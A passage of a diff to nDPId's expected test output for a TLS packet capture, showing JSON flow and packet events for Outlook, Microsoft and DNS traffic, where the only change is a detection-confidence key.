WCyhtCDvzCtVbUxSi2WZ66rDdU3aSKcEOMnDfpPuQ3aNkoqkdkwbdMewaWAPifWpjrrxg90ieLTE7FgbcxFjvhr5lFLSoRBF\/iPJs6lHTLDkWB5y15f1r\/8ZLDb4IhW9FIX\/CLiZ6rpS0mHTHUE9vn\/9hAsmx46xOm3J34VvMgqFYNluvzn3dUGnNnv4rW9ETLU5nx9MjAInMLEQZjDDkNtlaMy4FrKcYLZYQdYzERpfoBvKuaTJfKsWfO7jgAn1v6gbrSWphH3cXzQjxw802J0V4QeazmBVGA0E6lG79pCNEO0uh2dgwktSmtwiCBclBc5tjf6nl4O1l4nqizShQRxCCIPprqlc5ewvpot0KzGllydHXYVwvl3NqOGVnDVbcYW6rsr9cNQcgn1WFKVBGaaHM+XgnvZNhqKSKSS\/JwnHZ96JaxzHCfl4G5C2cceJe1cA34Dat1FKEtweJ9xvHyrHpcm5q9Vkp7cv2o7Ygb+hipT+4C1cSkXBVesDC0+tvSXpCsG73FkouarVtpL+0PQKkzAR1yJgDVrUYv9JCem0QTLOVmTHZ+lN3HGmtyIJYoBu1J4ll241iHn4yj6vQ701Nb8mVXZ6EpF\/5V+Ojw4OShpQ9K4JNfmRah1H4u1+tm5sdLnJXJCnxd1z1bP35y0tiPSMOaFD7D36ftgNesfeblmbdO3QvYo5sZjH2g\/rkgDvWctEdVPFefeneKNa6YJtDm2B1tmPiPBA9Oq0w39UHoupp7PhIxW8KMg8k6pOGMjzQ6Lk23qZ2phXBaaIaaOL394fc7c7DxLl8DqdGBlLveqkkwCREFnxvKjAePN1cC1XOtq0lnaYt1kQ27UguJ0fER9DAfYowgtFCNAKFVeNA3gSi1AQ+OtFaANU7+ThFzU9jKVufQm+9414vvr6INHdHhMJCKTXzk4z8zZd0u+NZ05MVhtrOOr5TlUY0TGx+kJE8="} 01656{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":111,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1626168078673,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":936,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":936,"pkt_l4_len":902,"thread_ts_msec":1626168078673,"pkt":"WNVuaKQA8BiYFWV8CABFAgOaAABAAEAGncbAqAF5NGKjEtC0AbvnBmJ6yo5yyVAYEADQ3AAA8smVcb3q7jInDMp6iu2tmr5Z01S6ktfb24g2DVivJvFFx18svOuqK0sgnY23ZGcWDPabxfRHCA4+gQkog41eD9Q+jY8o9PdPxSEJPwKKiq97+swgykYZPYYGmASILHqMJuZfByhEv3xViLnOQSEMlZhcFWZRFTusxMYced9WKWA0fc6Tz6HTt2Slu4vTvwt52pLlywDQ+moDsDqD4uzlqRKVGfUL\/ch1qgzh1ik3fV6dkbtg2JStfj9+0gWhw\/1tpp41Yq3ViTYYlVWsBAlK9383UtTU6832bkiivRikzvg6xlr6cUoD8pfbv255mX4wGzTGlmpvD4zQbPqZWm+dyGHA4KTjyuOM3iUOXvN2EIc4hSFWRtZSWhTg95jPk2WAmsedaTcdmQKZ2viJIrwprKiA8pqElIbad4UayJEEQ2rLEHe+6Rkn7weFiJ9Cf4UMQ6av+K70+Y96itdD4PDv0OKsC6tZfU\/tfc4I3DNLWON4dS6I+6zur216gRLFptPxg8nJaKRiptY9M7sohpWI5akHqMg98N8hf2hc0wH9zfT\/L5fz7Z9CQdyywynd2mPmUEW9OWFeYn4wEC\/gdxA80M9Zzf7uv0KAn+8LelSJkvdI3pBiv4FC333GGWS6fic1Zy4pYfk+L8GFZinANnaiXdJr7xAtMQ1GYOBWAHKoH+GJ8tU2xACRvM36EvIAH0I2RrIzXjHRnEOXkSC+CLSu8xyz6ePYQHWJqTeOV24udwyFiAkzDPh7H2SHxmU7LHZwkam8rX9zgmZLxdYHlhAD2yJRjuwO6msg2yZjsqwSwxdSZJhRunBsHb4p7DEvQLMPjpsbatjtgVN9T+qsCyHCJEkFmMU3QsxkCGtossZlWOQrLODqkaHoKbAV0ZeWnv1dwukSAWvNXFgALrC\/LDs9Yk\/0HHogbwj5gGNEDtJS+nkfi7bA8yoN5eCDO2Vffn4zk+ciDVKaCLhgHHzVMIfIKVrI1fMzRQLNYRDWjxKcqdipYwYp0PAI+b3Yx\/DzTVijfHkaedZRCvCw9VPw+QLgF0VkIyTaHhWJgvUO1Zj1YHqbkkNGKFdwVWPQGrGrq1LqA0g1BITMzZ35AcyWNuoGr66LZrtpjF+wDWVoz964kvXYU00tfXiJSAYozGe62YqD95apGcA76\/XZl5+SMB+fuqPf"} -00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":111,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168078673,"flow_last_seen":1626168078673,"flow_idle_time":7580000,"flow_min_l4_payload_len":882,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":2330,"flow_avg_l4_payload_len":1165,"midstream":1,"thread_ts_msec":1626168078673,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.98.163.18","src_port":53428,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Outlook","breed":"Acceptable","category":"Email"}} +00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":111,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168078673,"flow_last_seen":1626168078673,"flow_idle_time":7580000,"flow_min_l4_payload_len":882,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":2330,"flow_avg_l4_payload_len":1165,"midstream":1,"thread_ts_msec":1626168078673,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.98.163.18","src_port":53428,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Outlook","breed":"Acceptable","category":"Email"}} 02440{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":112,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1626168078674,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1502,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1502,"pkt_l4_len":1468,"thread_ts_msec":1626168078674,"pkt":"WNVuaKQA8BiYFWV8CABFAgXQAABAAEAGm5DAqAF5NGKjEtC1Absg2a\/ZF4bv+FAQEAAXNQAAFwMDDxEAAAAAAAAAWp5GeZKPSB7w816DdrEEqHX9aC+YviuGDPWPZX1hWzeJO56tAdFAhHB2CxgaqBUmTp67G7NpRBSOlgFCk7Rz2PSU2RjHkzQN9DEZnqJDnpBJTPsDp7SajTr4PwFG5UIWqi9zReh9EtkjrIng35h3QjPy5pgRGIggIUa\/zHocLpnIHnx2NID0uKUJhEdZqWE4pcslJgdX4YfRKdEPTj3+9rZ3sLr++gXqMzrFGQr9EQgG6\/tRgaivaU0aW0ztmvO3\/qkvcrzeXMhBZCC0bJVz2bEiKKLd+7L5\/eHqmfs1xGLoIVjqoCMrClOzLnCDeSqZPqsY8tiTWubYavu9O8jG+ez+5Hkdw5Zqb5fD9oP0Ibcl2RZkNVM95HmLc4YD76gl\/z1R4Pv\/X+\/YqfzUCuKlbPSA2rgZ1AV5JLooIc7Be\/pYYpsCuIChG0LSB3wA5uDyqmIr57tSP8OI\/758hiFPERZ62qSkcVdehrui9bd5qubE0mTze86LYcawTdiQmMEKmQRBM4+o\/tLRLdTTAHx+8vIwh6AzvixYQvN8Ez8hb+phV92bD5q6hI7M8\/JGEZPjzNU+xKD+ISfZsgEkV2kgA1pedlTeMVuH\/BZclBXFLL5qRfhqeOdjAoZ73FOd8rYWzIde9ssd7E5A+tydX+O9p3kJTnLjhtup7pO1JKqLG8qs7kj4hnoO0t81p9EOSvl36UbBJ\/\/ta9Ym0CAwPBXdG+wAoJE7kndX2G2xUen+Ixk8fIsE2mGGvoV1Us4DqJZlvb5kJ5nWps2iI9sPEuDCreKTajgn6cDATXaCOavuKfFgCBU7JO2xOSJglSq7B7a6Rdhau\/3b0GgchjkVWsL6KTcuabDbsB3hgBi88ZjqfwCY2Nb9XY\/bt2EvOKRb8ymRF+9JboUUDmnm0q\/gX\/KH1nOauqAmFBE3aLfeWKAmW\/ItfqIuivKY+YDdWjc0HTcG1YGSfVrjr6aDU6y2TemMpnTIWRCWpvy7K5WBLe5V6MFlmxWmTIqOmq2cAefJgEppNDtGK3uWqgpEtHWR7rX\/TY7ljVAdLTNKRs1CNLO9YQxubR3nk57cLpnXbrfj+v+Lj4KuWOQnGZWe\/F\/8TM6cKx8vWkZgNLvg7fWbclvvuNbfQRKs6H63c6ZScHSu30WlwdJca10PuaOw6kUS8+8NgGoTM6EEL\/iGpUGKZDRPOSrSaO1EzIgUat4tPz1jNP77yXzl++\/KXlg43EyAlQZOnRr\/NFgfM4gzLfr7lDMDA3E0lRT+v95g78gwDuwXQ7BBPnvAls+NQwZbP7V0m0BvQjEB6p0fzqeSFPDpYbzQ0ZX6GjzMOnlKuf61RRwzVqCy8gfKQUs3skC1gvLgCV41uMUPTEfGnxmlKSMMVedbAmX+sTsKmnVgrA25Xxx44Rnz4aF\/zFkDRBzvExZFLH6OXGMRXTSfsHLF31OKw0QjcHdXKZOHlLQlo\/rph7r52bcX5wKB3t7XosUhaCCO8kIb3nCkluBB+sXwJFoKumEHcqAVe9Z4M3C6DXD1eVQo5daa5wFvH9M6HZwbTveh7JVbvVN9W+ACJJ82iXxyheKmXUZCNDVrtQaESdZ59LGHrlE2HGCg9gGl6VFzZLygZFAEjriuVbNilai2NxLiYx9gUajnBWGV8FEvryyeJFk\/CE6DTkT5\/Kza\/2Cu73O0Rb9icER0MPyduoWRXyUIUkVQogDMSeWnU3q93wChqd9rGdeB4XXoIzzAE+R\/SRKrrCLHUwPWEq20rYRcseqENqusBQFpiEpsgV0CsZ5TY3+f7Z7A3Y\/FdWIGrpWpaXY666wWyBIvkxWFWygO7Vx3zPMA3tnlzCspk3L3LaW0mn2EnnX30PeY5vR3upafUEAXSo6G6QdKCFC0FARyFx\/T+JPasg5u4ToWCOaORH2gHwo="} 02146{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":115,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1626168078674,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1292,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1292,"pkt_l4_len":1258,"thread_ts_msec":1626168078674,"pkt":"WNVuaKQA8BiYFWV8CABFAgT+AABAAEAGnGLAqAF5NGKjEtC0AbvnBmXsyo5yyVAYEACH9AAAFwMDBNEAAAAAAAAA3P9mE\/WxzRlzhJVvrME7arSt4cc4b80\/fLZ45lg2jTLN+h8OznVOp0v0YJHlvGb6zo1R0y0127nCMLhWICtDPy2FtY028GLgaBdr\/YLaP88jpPC2wcimHwfty2x4WKI+LPeYoEPRAYicmmTAxPlFzZuaf1iKs+Yu1pMdI4311+rTrqclcjjttiygU+MPtoh4rbcQQi4hllQZ9bpYWoVqJ+iSt2BigYH05vsyHmu879GAhVkohrBF89b4NLKyNAMo0\/QxqgG1rqZTGisx7FjNs8y8uxtw5iKWrSpnhwqsK8HdkzdODGF90yeLdn3CCNJgdm3aNHt1MWZ4JOUy5GzAb47y2cy051il96yYxnPjPoqHZ+sb8GqydD+Wdtw8hwTtkDW7xa7mACJTwuWOIU79l2oDnl63ylL8+JOFMkvCyqpvRSJQTp84k5efBKX3KzQjur4Xu79lO0LFF2NRDD6HkdNIzdZ6GrjQ6cfeKSx84X\/NzyeoBGfExOO\/4zYWpKYV5emN2qK2WwFz9V6yUT4FYCEpMENn4zKRUt2gX3+QJ3UggRDfQ8Atlul6XoqofW\/JfCf+PszhgtXLpc9QxVs3UVfeC+BCBsI\/evJsy+X2zvUBACJp1Cao7EAa\/un53A8cu1w+QQ\/3\/qpgFcwuebDk+bTd2XwEmQcRY5ntXb11cm+t6EgiuWMc8LtkZLW4g6Qk7C3exETENqr8qaKtA57iz69EbEaWfUTp590Cm1yhdVWnzQVccpyZRGULka\/D5PTiR6o3UCqpNAg8I43q9sRPGdaOzmk6LqC8kGMMj1N8P2DVYvcwJb3HB14BO5Blfb4kQNaSZCX81P5eekubMcrCkaYeLnnSigA4c2KBCJI0\/apWCuj0F93qKZChgzKT77EQe9PNeEwH9qa2yEnfxe42M9M\/dR+ZqezhwWXFtPpr0H\/z1rdkNoyBVAssfrasWrQx8flrDgnBIYD1460XCzVYLXxrhZgLoJb3EnAJ7vXCxsY0pXppBEZDDdim91oHmoHdPCYl0He7JYRSbPjtQSoUoTzcJp7PxKyOdGVLYBgNJz7zY+ZgHgZgGwjl0V0nqegEjC35a9y8SnKE63ljmDCyN8pWus5ViXGLvQ2Q\/1YgRAjjfufkIFVVjlXa01yHVzB76HDZ1tJk9CCm9ap34gzfAiHToNIXmogCeGqn2CdKyBeaiMSGkpYWcPn2x5217jPoRlFNQrlxxA+bM2VQvFdzsWSjAthvEYT8M0NKxSkvF5fH3eNJZYaUGLIiBrgIGbm4pAM\/x0xPOGKmtUmoLltnDzmkCbUcHYiWy3Y7nJHL865N2SK80a9Zp+7VINzLRf\/Ervx7NR7ytI7hPsERS2gR+t5ngZO4VMBVWlnWrW+Q0k4Q1KqCHh7RRwRxv5sH62zb+RmG6I1XbjkIiH\/fDv5F+LoUplAhBWHtQdc4gcY6R330O9wWahGV3oVm2bRxt8RZJJruLD1DYhwwT99J89GgAfYqHkYbcpYCi6LHqYqrQ6UmOTNERlSpwcXx4Ujj\/ftQuU3MAdSrHpDwvlJG8V3434OyaQQ78dblNHDOqOcIm3UL5vFVeeu11Ar10lwqpNk+NFgn+2DriZe1BIfTkQZAL4Pitnn2QjlLKFQ="} 00594{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":116,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1626168078676,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":147,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":147,"pkt_l4_len":113,"thread_ts_msec":1626168078676,"pkt":"8BiYFWV8WNVuaKQACABFAACFmUUAAHgR1vEICAgIwKgBeQA1yx4AcZEiotGBgAABAAEAAAAAAzIzNQIzMwIyMgEyB2luLWFkZHIEYXJwYQAADAABwAwADAABAABT5QAzDGEyLTIyLTMzLTIzNQZkZXBsb3kGc3RhdGljEmFrYW1haXRlY2hub2xvZ2llcwNjb20A"} -00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":116,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1626168078653,"flow_last_seen":1626168078676,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":191,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1626168078676,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":51998,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"235.33.22.2.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} -00677{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":155,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1626168078673,"flow_last_seen":1626168078741,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":11827,"flow_avg_l4_payload_len":369,"midstream":1,"thread_ts_msec":1626168078741,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.98.163.18","src_port":53429,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Outlook","breed":"Acceptable","category":"Email"}} -00677{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":182,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1626168078673,"flow_last_seen":1626168078815,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":12751,"flow_avg_l4_payload_len":398,"midstream":1,"thread_ts_msec":1626168078815,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.98.163.18","src_port":53428,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Outlook","breed":"Acceptable","category":"Email"}} +00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":116,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1626168078653,"flow_last_seen":1626168078676,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":191,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1626168078676,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":51998,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"235.33.22.2.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} +00677{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":155,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1626168078673,"flow_last_seen":1626168078741,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":11827,"flow_avg_l4_payload_len":369,"midstream":1,"thread_ts_msec":1626168078741,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.98.163.18","src_port":53429,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Outlook","breed":"Acceptable","category":"Email"}} +00677{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":182,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1626168078673,"flow_last_seen":1626168078815,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":12751,"flow_avg_l4_payload_len":398,"midstream":1,"thread_ts_msec":1626168078815,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.98.163.18","src_port":53428,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Outlook","breed":"Acceptable","category":"Email"}} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":236,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168079158,"flow_last_seen":1626168079158,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1626168079158,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53914,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":236,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1626168079158,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1626168079158,"pkt":"WNVuaKQA8BiYFWV8CABFAABAAABAAEAGRffAqAF5KHEKL9KaAbvsuitsAAAAALAC\/\/8ZDgAAAgQFtAEDAwYBAQgKPdH+3gAAAAAEAgAA"} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":237,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168079191,"flow_last_seen":1626168079191,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1626168079191,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53915,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":237,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1626168079191,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1626168079191,"pkt":"WNVuaKQA8BiYFWV8CABFAABAAABAAEAGRffAqAF5KHEKL9KbAbvR3yLxAAAAALAC\/\/88QgAAAgQFtAEDAwYBAQgKPdH+\/wAAAAAEAgAA"} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":238,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1626168079206,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1626168079206,"pkt":"8BiYFWV8WNVuaKQACABFAAA0JA1AAG0G9PUocQovwKgBeQG70ppkHrV27LorbYAS\/\/90QAAAAgQFoAEDAwgBAQQC"} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":239,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1626168079207,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1626168079207,"pkt":"WNVuaKQA8BiYFWV8CABFAAAoAABAAEAGRg\/AqAF5KHEKL9KaAbvsuittZB61d1AQEACk\/wAA"} -00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":240,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168079158,"flow_last_seen":1626168079207,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1626168079207,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53914,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":240,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168079158,"flow_last_seen":1626168079207,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1626168079207,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53914,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":241,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1626168079243,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1626168079243,"pkt":"8BiYFWV8WNVuaKQACABFAAA0S\/NAAG0GzQ8ocQovwKgBeQG70pvEiS5w0d8i8oAS\/\/++MAAAAgQFoAEDAwgBAQQC"} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":242,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1626168079243,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1626168079243,"pkt":"WNVuaKQA8BiYFWV8CABFAAAoAABAAEAGRg\/AqAF5KHEKL9KbAbvR3yLyxIkucVAQEADu7wAA"} -00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":243,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168079191,"flow_last_seen":1626168079243,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1626168079243,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53915,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01414{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":246,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1626168079158,"flow_last_seen":1626168079255,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":625,"midstream":0,"thread_ts_msec":1626168079255,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53914,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","server_names":"wdcp.microsoft.com,spynet2.microsoft.com,wdcpalt.microsoft.com,spynetalt.microsoft.com,*.cp.wd.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"17e97216fa7f4ec8c43090c6eed97c25","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Secure Server CA 2011","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=wdcp.microsoft.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"81:41:67:66:7E:A9:1B:AA:61:3D:DE:D1:41:E7:17:13:CE:C4:3B:22"}} -01414{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":253,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1626168079191,"flow_last_seen":1626168079297,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":547,"midstream":0,"thread_ts_msec":1626168079297,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53915,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": 